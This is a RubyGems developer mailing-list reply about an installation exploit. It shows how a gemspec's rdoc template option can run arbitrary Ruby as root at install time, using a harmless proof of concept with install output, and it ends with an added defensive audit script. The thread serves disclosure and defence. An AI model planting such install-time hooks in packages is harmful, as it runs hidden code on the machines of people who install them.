* Eric Hodel ([EMAIL PROTECTED]) wrote:
> I've checked in fixes for an installation exploit found by Gavin  
> Sinclair.  Here's a draft email describing the exploit and how to fix  
> RubyGems.  I only supplied patches for the past two versions of  
> RubyGems, since tattle says that's what everybody uses.
> 
> Subject: RubyGems 0.9.0 and earlier installation exploit
> 
> Problem Description:
> 
> RubyGems does not check installation paths for gems before writing  
> files.

The potential security problems with RubyGems are actually much worse
than that.  Documentation and tests are executed as the user doing the
install (which, as you said, is usually root).  That means I can embed
arbitrary Ruby code in either the documentation template or the unit
tests and it will usually be run as root.  For example:

  spec = Gem::Specification.new do |s|
    # usual gem stuff here
    # ...

    s.rdoc_options = %w{--template ./malice.rb}
  end

  # contents of malice.rb:

  # THIS CODE WILL BE RUN AS ROOT ON MANY MACHINES
  $stderr.puts "hello, i'm running as #{ENV['USER']}"
  exit 0

All of that produces the following:

  [EMAIL PROTECTED]:~/proj/snippets/ruby/malice> gem build ./malice.gemspec
    Successfully built RubyGem
    Name: Malicious-Gem
    Version: 0.1.0
    File: Malicious-Gem-0.1.0.gem
  [EMAIL PROTECTED]:~/proj/snippets/ruby/malice> sudo gem install ./Malicious-Gem-0.1.0.gem
  Password:
  Successfully installed Malicious-Gem, version 0.1.0
  Installing ri documentation for Malicious-Gem-0.1.0...
  Installing RDoc documentation for Malicious-Gem-0.1.0...
  hello, i'm running as root

Obviously the same thing can be done with unit tests.  While neither of
these is a bug with RubyGems per se, they're both convenient places to
hide sneaky code that will be run as root on a lot of machines at
install time.


-- 
Paul Duncan <[EMAIL PROTECTED]>        OpenPGP Key ID: 0x82C29562
http://www.pablotron.org/               http://www.paulduncan.org/
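An added example, not code from this thread or from RubyGems: a small pre-install audit that flags the two risks discussed above, an rdoc template option that points at a file shipped inside the gem (code RDoc will load as the installing user) and a file entry that would be written outside the gem's install directory. The function names and the sample gemspec values are mine.

```ruby
# Added example (not from the thread): audit a gemspec's rdoc_options and
# file list before `sudo gem install`. Names and samples are constructed.
TEMPLATE_FLAGS = %w[--template -T].freeze

# Return the template values in rdoc_options that name a file rather than a
# built-in template. Handles "--template x", "--template=x" and "-T x".
def file_templates(rdoc_options)
  found = []
  opts = rdoc_options.dup
  until opts.empty?
    flag, value = opts.shift.split('=', 2)
    next unless TEMPLATE_FLAGS.include?(flag)
    value ||= opts.shift          # value given as the next argument
    next if value.nil?
    # A built-in template is a bare word ("html"); a path or a .rb file is
    # Ruby that RDoc will load, i.e. code that runs as the installing user.
    found << value if value.include?('/') || value.end_with?('.rb')
  end
  found
end

# True when a file entry from the gem resolves outside install_dir
# (covers "..", absolute paths and bare "." tricks via expand_path).
def escapes_install_dir?(install_dir, entry)
  root = File.expand_path(install_dir)
  target = File.expand_path(entry, root)
  target != root && !target.start_with?(root + File::SEPARATOR)
end

# Collect human-readable findings for the spec values handed in.
def audit(spec_files:, rdoc_options:, install_dir:)
  findings = []
  file_templates(rdoc_options).each do |t|
    findings << "rdoc template loads code at doc time: #{t}"
  end
  spec_files.select { |f| escapes_install_dir?(install_dir, f) }.each do |f|
    findings << "file entry escapes install dir: #{f}"
  end
  findings
end

if __FILE__ == $0
  # Constructed sample mirroring the gemspec quoted in the thread.
  puts audit(spec_files: %w[lib/malice.rb malice.rb ../../outside.txt],
             rdoc_options: %w[--template ./malice.rb],
             install_dir: '/usr/lib/ruby/gems/1.8/gems/Malicious-Gem-0.1.0')
end
```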


_______________________________________________
Rubygems-developers mailing list
Rubygems-developers@rubyforge.org
http://rubyforge.org/mailman/listinfo/rubygems-developers